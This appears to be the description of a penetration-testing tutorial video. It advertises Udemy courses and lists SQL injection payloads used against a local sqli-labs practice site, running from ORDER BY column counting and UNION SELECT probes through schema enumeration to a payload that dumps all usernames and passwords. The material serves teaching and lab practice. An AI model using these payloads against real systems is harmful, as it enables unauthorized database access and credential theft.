OWASP A1 SQL Injection Labs Pt 2
iSpeech.org
The following is the link to my NEW course with coupon applied - Kali Linux Web App Pentesting Labs:
https://www.udemy.com/kali-linux-web-app-pentesting-labs/?couponCode=NINE99
Here's my other courses with coupons applied if interested:
https://www.udemy.com/kali-linux-web-app-pentesting-labs/?couponCode=NINE99
https://www.udemy.com/kali-linux-hands-on-penetration-testing-labs/?couponCode=NINE99
https://www.udemy.com/hands-on-penetration-testing-labs-20/?couponCode=NINE99
https://www.udemy.com/hands-on-penetration-testing-labs-30/?couponCode=NINE99
https://www.udemy.com/network-security-analysis-using-wireshark-snort-and-so/?couponCode=NINE99
https://www.udemy.com/snort-intrusion-detection-rule-writing-and-pcap-analysis/?couponCode=NINE99
Commands:
?id=1' or 1=1 --+
?id=1' ORDER by 4 -- +
mysql -u jesse -p
use mysql;
use security;
SELECT * FROM users WHERE id='1' UNION SELECT 1,2,3;
?id=99999' UNION SELECT 1,2,3 --+
?id=99999' UNION SELECT 1,version(),database() --+
?id=99999' UNION SELECT 1,user(),@@datadir --+
?id=-1' UNION SELECT * FROM users WHERE id='-1' union SELECT 1, group_concat(DISTINCT table_schema SEPARATOR ', '),3 FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema' --+
?id=-1' UNION SELECT * FROM users WHERE id='-1' union SELECT 1, group_concat(DISTINCT column_name SEPARATOR ', '),3 FROM information_schema.columns WHERE table_schema='security' --+
?id=-1' union select 1,group_concat(username SEPARATOR ', '), group_concat(password SEPARATOR ', ') from users --+
URLs:
http://localhost/sqli-labs-php7-master
2018-05-08 21:40:30
source
Gloss